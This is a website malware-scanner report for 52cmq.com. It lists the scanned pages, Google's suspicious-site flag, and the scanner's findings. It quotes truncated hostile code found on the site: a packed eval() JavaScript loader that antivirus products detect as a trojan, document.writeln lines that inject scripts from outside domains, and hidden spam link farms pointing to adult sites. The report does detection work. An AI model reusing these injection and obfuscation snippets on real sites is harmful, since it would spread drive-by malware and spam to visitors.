New scan:

Malware Scanner report for 52cmq.com

Malicious/Suspicious/Total urls checked
2/10/15
12 pages have malicious or suspicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "52cmq.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=52cmq.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.52cmq.com/
200 OK
Content-Length: 9635
Content-Type: text/html
suspicious
Page code contains blacklisted domain: www.jiank8.net

...[2468 bytes skipped]...
.com/686hk-mzvczcra/">谢娜和文强有关系吗</a></li><li><a href="http://www.aifantizi.com/aifantizi-mwvzxccr/">网球王子真人版申辰</a></li><li><a href="http://www.bljsx.com/bljsx-mqimavi/">金瓶梅1免费在线观看</a></li><li><a href="http://www.ccyj123.com/ccyj123-mraaaczrw/">2013山西中考作文</a></li><li><a href="http://www.jiank8.net/jiank8-mmiqqicr/">巴西美女性感热舞</a></li><li><a href="http://www.40fg.com/40fg-mvmcmvxq/">侏罗纪公园3百度影音</a></li><li><a href="http://www.jyz8.com/jyz8-mirvwiqr/">美女小游戏圣诞老人2</a></li><li><a href="http://www.deyuu.com/deyuu-mxazxmxm/">长春东北虎爱心彩虹影院</a></li><li><a href="http://www.517yl.com/517yl-vcvxvqzm/">3d动画电影高清
...[1614 bytes skipped]...

http://js.adm.cnzz.net/s.php?sid=252114
200 OK
Content-Length: 3677
Content-Type: application/x-javascript
clean
http://www.52cmq.com/static/mulu2/tj.js
200 OK
Content-Length: 406
Content-Type: application/javascript
clean
http://www.52cmq.com/indexbom.js
200 OK
Content-Length: 2981
Content-Type: application/javascript
malicious
Malicious code found. Script contains blacklisted domain: www.zoudi6.biz

function getArrayItems(arr,num){var temp_array=new Array();for(var index in arr){temp_array.push(arr[index])}var return_array=new Array();for(var i=0;i<num;i++){if(temp_array.length>0){var arrIndex=Math.floor(Math.random()*temp_array.length);return_array[i]=temp_array[arrIndex];temp_array.splice(arrIndex,1)}else{break}}return return_array}var array=new Array();array=new Array('http://www.zoudi6.biz\/web\/login.html|ÓûÍû»ùµØ','http://www.zoudi6.biz\/web\/login.html|É«ÀÇÎÑ×ÛºÏ');array=getArrayItems(array,28);document.writeln('<table width="800" height="5" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#cccccc">');document.writeln('<tr>');var split=new Array();for(i=0;i<array.length;i++){if(i%7==0&i>0){document.writeln('</tr>');document.writeln('<tr>')}split=array[i].split('|');
...[2473 bytes skipped]...

Decoded script:


<table width="800" height="5" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#cccccc">
<tr>
<td ><div align="center" ><a href="http://www.zoudi6.biz/web/login.html?259se" target="_blank">É«ÀÇÎÑ×ÛºÏ</a></div></td>
<td ><div align="center" ><a href="http://www.zoudi6.biz/web/login.html?259se" target="_blank">ÓûÍû»ùµØ</a></div></td>
</table>
<SCRIPT> var text=""; day = new Date( ); time = day.getHours( );
¡¡if (( time>=0) && (time < 6 ))
if(parent.win
...[1520 bytes skipped]...

http://www.52cmq.com/gg/top.js
200 OK
Content-Length: 244
Content-Type: application/javascript
suspicious
Page code contains blacklisted domain: www.159gps.com

document.writeln("<script language=\"javascript\" type=\"text/javascript\" src=\"http://www.159gps.com/gg/zhanqun.js\"></script>");
document.writeln("<script src=\"http://www.vshinantam.com/gg/indexbom.js\" language=\"javascript\"></script>");

http://www.52cmq.com/52cmq-maaccmaci/
200 OK
Content-Length: 8828
Content-Type: text/html
suspicious
Page code contains blacklisted domain: www.jiank8.net

...[2250 bytes skipped]...
><a href="http://%77%77%77%2E%7A%6F%75%64%69%36%2E%62%69%7A/?微信头像性感嘴唇" target="_blank"><img src="/uploads/images/20…侣头像一对两张</a></li><li><a href="http://www.bljsx.com/bljsx-mqaccvcwa/">qq男生头像带字超拽</a></li><li><a href="http://www.ccyj123.com/ccyj123-mraccvacz/">2013最新夜店性感衣服</a></li><li><a href="http://www.jiank8.net/jiank8-mmaccvavw/">qq情侣头像一对带字</a></li><li><a href="http://www.40fg.com/40fg-mvaccvzqq/">qq背景皮肤大图女生</a></li><li><a href="http://www.jyz8.com/jyz8-miaccvwar/">张馨予cf</a></li><li><a href="http://www.deyuu.com/deyuu-mxaccvwim/">mc女神照片</a></li><li><a href="http://www.517yl.com/517yl-vcaccvqrv/">qq网名男生可爱</a></li><li>
...[1737 bytes skipped]...

http://www.52cmq.com/52cmq-maaccmaci/indexbom.js
404 Not Found
Content-Length: 45857
Content-Type: text/html
suspicious
Page code contains blacklisted domain: www.zoudi6.biz

...[380 bytes skipped]...
pe>
<META name=keywords content=ÐÔ°É|´ºÅ¯»¨¿ª,ÐÔ°ÉÓÐÄã|Sex8|ÐÔ°É×îеØÖ·£¡>
<META name=description content=ÐÔ°É|´ºÅ¯»¨¿ª,ÐÔ°ÉÓÐÄã|Sex8|ÐÔ°É×îеØÖ·£¡>

<script id="wf" type="text/javascript" charset="gb2312" src="http://app.adanzhuo.com/appiso.js?l=cparifu&uid=1154"></script>

<META content=IE=EmulateIE7 http-equiv=X-UA-Compatible><LINK rel=stylesheet
href="http://www.zoudi6.biz/aimg/layout.css"><LINK rel="shortcut icon"
href="favicon.ico">
<DIV style="DISPLAY: none"><div style="display:none"><script language="javascript" type="text/javascript" src="http://js.users.51.la/16360978.js"></script>
<noscript><a href="http://www.51.la/?16360978" target="_blank"><img alt="&#x6211;&#x8981;&#x5566;&#x514D;&#x8D39;&#x7EDF;&#x8BA1;" src="http://img.users.51.la/16360978.asp"
...[3997 bytes skipped]...

http://app.adanzhuo.com/appiso.js?l=cparifu&uid=1154
200 OK
Content-Length: 3181
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('L q$=["\\I\\p","\\Q","\\1g\\l\\D\\s\\k",\'\\1c\\k\\g\\m\\f\\j\\l\',\'\\H\\k\\f\\n\\l\\h\',\'\\Y\\z\\z\\u\\f\\1x\\f\\F\\1b\\g\\l\',\'\\1l\\f\\s\\1k\\h\',\'\\1b\\1u\\1c
... 2234 bytes are skipped ...
\\f\\u\\j"](q$[16])',62,116,'|||||||||||||||x65|x69|x6f||x6e|x72|x74|x64|x73|x61|x66|_|x68|x63|x6d|x6c|x67|x78|0x1|x2e|x70|x4f|x75|x20|x3d|x2f|x62|false|x50|x77|x76|x30|var|x2d|x3a|window|x6a|x3f|x4c|navigator|x32||x37|x31||x41|x3c||||||||x3e|x38|if|x71|x4b|x54|x33|x36|x35|x26|x42|x49|x79|x6b|x47|versions|function|x45|x53|x4d|x39|x7a|x34|x48|x2b|x5f|x57|AppleWebKit|Mobile|gecko|iPhone|x43|ios|webApp|android|iPad|language|Mac|OS|mobile|x56|trident|return|CPU|webKit|presto|else'.split('|'),0,{}))

Antivirus reports:

Avast
JS:Agent-CBY [Trj]
Fortinet
JS/WinDocW.A!tr

http://js.users.51.la/16360978.js
200 OK
Content-Length: 1980
Content-Type: application/x-javascript
clean
http://www.52cmq.com/test404page.js
404 Not Found
Content-Length: 45857
Content-Type: text/html
suspicious
Page code contains blacklisted domain: www.zoudi6.biz

...[380 bytes skipped]...
pe>
<META name=keywords content=ÐÔ°É|´ºÅ¯»¨¿ª,ÐÔ°ÉÓÐÄã|Sex8|ÐÔ°É×îеØÖ·£¡>
<META name=description content=ÐÔ°É|´ºÅ¯»¨¿ª,ÐÔ°ÉÓÐÄã|Sex8|ÐÔ°É×îеØÖ·£¡>

<script id="wf" type="text/javascript" charset="gb2312" src="http://app.adanzhuo.com/appiso.js?l=cparifu&uid=1154"></script>

<META content=IE=EmulateIE7 http-equiv=X-UA-Compatible><LINK rel=stylesheet
href="http://www.zoudi6.biz/aimg/layout.css"><LINK rel="shortcut icon"
href="favicon.ico">
<DIV style="DISPLAY: none"><div style="display:none"><script language="javascript" type="text/javascript" src="http://js.users.51.la/16360978.js"></script>
<noscript><a href="http://www.51.la/?16360978" target="_blank"><img alt="&#x6211;&#x8981;&#x5566;&#x514D;&#x8D39;&#x7EDF;&#x8BA1;" src="http://img.users.51.la/16360978.asp"
...[3997 bytes skipped]...

http://www.52cmq.com/52cmq-mazcwxiz/
200 OK
Content-Length: 8630
Content-Type: text/html
suspicious
Page code contains blacklisted domain: www.jiank8.net

...[2445 bytes skipped]...
;div class="friend_link">
<li><a href="http://www.686hk.com/686hk-mzzcqvmw/">撸鸡</a></li><li><a href="http://www.aifantizi.com/aifantizi-mwzcqiwq/">陆毅</a></li><li><a href="http://www.bljsx.com/bljsx-mqzcqxcr/">鹿城影</a></li><li><a href="http://www.ccyj123.com/ccyj123-mrzcqxvm/">路边的</a></li><li><a href="http://www.jiank8.net/jiank8-mmzcrcqv/">路母子交尾</a></li><li><a href="http://www.40fg.com/40fg-mvzcraai/">露春红</a></li><li><a href="http://www.jyz8.com/jyz8-mizcraix/">露露人体艺术</a></li><li><a href="http://www.deyuu.com/deyuu-mxzcrzmc/">露屁</a></li><li><a href="http://www.517yl.com/517yl-vczcrwwa/">露穴美女</a></li><li><a href="http://www.bianhao.net/bianhao
...[1612 bytes skipped]...

http://www.52cmq.com/52cmq-mazcwxiz/indexbom.js
404 Not Found
Content-Length: 45857
Content-Type: text/html
suspicious
Page code contains blacklisted domain: www.zoudi6.biz

...[380 bytes skipped]...
pe>
<META name=keywords content=ÐÔ°É|´ºÅ¯»¨¿ª,ÐÔ°ÉÓÐÄã|Sex8|ÐÔ°É×îеØÖ·£¡>
<META name=description content=ÐÔ°É|´ºÅ¯»¨¿ª,ÐÔ°ÉÓÐÄã|Sex8|ÐÔ°É×îеØÖ·£¡>

<script id="wf" type="text/javascript" charset="gb2312" src="http://app.adanzhuo.com/appiso.js?l=cparifu&uid=1154"></script>

<META content=IE=EmulateIE7 http-equiv=X-UA-Compatible><LINK rel=stylesheet
href="http://www.zoudi6.biz/aimg/layout.css"><LINK rel="shortcut icon"
href="favicon.ico">
<DIV style="DISPLAY: none"><div style="display:none"><script language="javascript" type="text/javascript" src="http://js.users.51.la/16360978.js"></script>
<noscript><a href="http://www.51.la/?16360978" target="_blank"><img alt="&#x6211;&#x8981;&#x5566;&#x514D;&#x8D39;&#x7EDF;&#x8BA1;" src="http://img.users.51.la/16360978.asp"
...[3997 bytes skipped]...

http://www.52cmq.com/52cmq-mawcawi/
200 OK
Content-Length: 11122
Content-Type: text/html
suspicious
Page code contains blacklisted domain: www.jiank8.net

...[2555 bytes skipped]...
nd_link">
<li><a href="http://www.686hk.com/686hk-mzwcxax/">胡宇崴半裸</a></li><li><a href="http://www.aifantizi.com/aifantizi-mwwcxxc/">湖南长沙</a></li><li><a href="http://www.bljsx.com/bljsx-mqwacma/">a8情色小说</a></li><li><a href="http://www.ccyj123.com/ccyj123-mrwaawz/">ady伦理</a></li><li><a href="http://www.jiank8.net/jiank8-mmwazcw/">Allegrait</a></li><li><a href="http://www.40fg.com/40fg-mvwazvq/">asianude4u.com</a></li><li><a href="http://www.jyz8.com/jyz8-miwawqr/">av.bobo.com</a></li><li><a href="http://www.deyuu.com/deyuu-mxwaqam/">avi电影免费下载</a></li><li><a href="http://www.517yl.com/517yl-vcwaqiv/">avi图片3333xbcom</a></li><li><a href="http://www.bianhao.net
...[1552 bytes skipped]...

http://www.52cmq.com/52cmq-mawcawi/indexbom.js
404 Not Found
Content-Length: 45857
Content-Type: text/html
suspicious
Page code contains blacklisted domain: www.zoudi6.biz

...[380 bytes skipped]...
pe>
<META name=keywords content=ÐÔ°É|´ºÅ¯»¨¿ª,ÐÔ°ÉÓÐÄã|Sex8|ÐÔ°É×îеØÖ·£¡>
<META name=description content=ÐÔ°É|´ºÅ¯»¨¿ª,ÐÔ°ÉÓÐÄã|Sex8|ÐÔ°É×îеØÖ·£¡>

<script id="wf" type="text/javascript" charset="gb2312" src="http://app.adanzhuo.com/appiso.js?l=cparifu&uid=1154"></script>

<META content=IE=EmulateIE7 http-equiv=X-UA-Compatible><LINK rel=stylesheet
href="http://www.zoudi6.biz/aimg/layout.css"><LINK rel="shortcut icon"
href="favicon.ico">
<DIV style="DISPLAY: none"><div style="display:none"><script language="javascript" type="text/javascript" src="http://js.users.51.la/16360978.js"></script>
<noscript><a href="http://www.51.la/?16360978" target="_blank"><img alt="&#x6211;&#x8981;&#x5566;&#x514D;&#x8D39;&#x7EDF;&#x8BA1;" src="http://img.users.51.la/16360978.asp"
...[3997 bytes skipped]...

http://www.52cmq.com/52cmq-maaiczxc/
200 OK
Content-Length: 8439
Content-Type: text/html
suspicious
Page code contains blacklisted domain: www.jiank8.net

...[2420 bytes skipped]...
href="http://www.686hk.com/686hk-mzaiacva/">关于做爱的小说</a></li><li><a href="http://www.aifantizi.com/aifantizi-mwaiaaqz/">观看好色男女</a></li><li><a href="http://www.bljsx.com/bljsx-mqaiazaw/">观月稚乃作品</a></li><li><a href="http://www.ccyj123.com/ccyj123-mraiaziq/">官人我要免费观看</a></li><li><a href="http://www.jiank8.net/jiank8-mmaiawrr/">惯束罗衫半露胸</a></li><li><a href="http://www.40fg.com/40fg-mvaiaqzm/">光光百度百科</a></li><li><a href="http://www.jyz8.com/jyz8-miaiaqxv/">光与影的传说在线创作</a></li><li><a href="http://www.deyuu.com/deyuu-mxaiarmi/">广末凉子写真</a></li><li><a href="http://www.517yl.com/517yl-vcaiamwx/">广州地铁3号线</a></li><li
...[1610 bytes skipped]...


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: 52cmq.com

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: 52cmq.com
Referer: http://www.google.com/search?q=52cmq.com

Result:
The result is similar to the first query. There are no suspicious redirects found.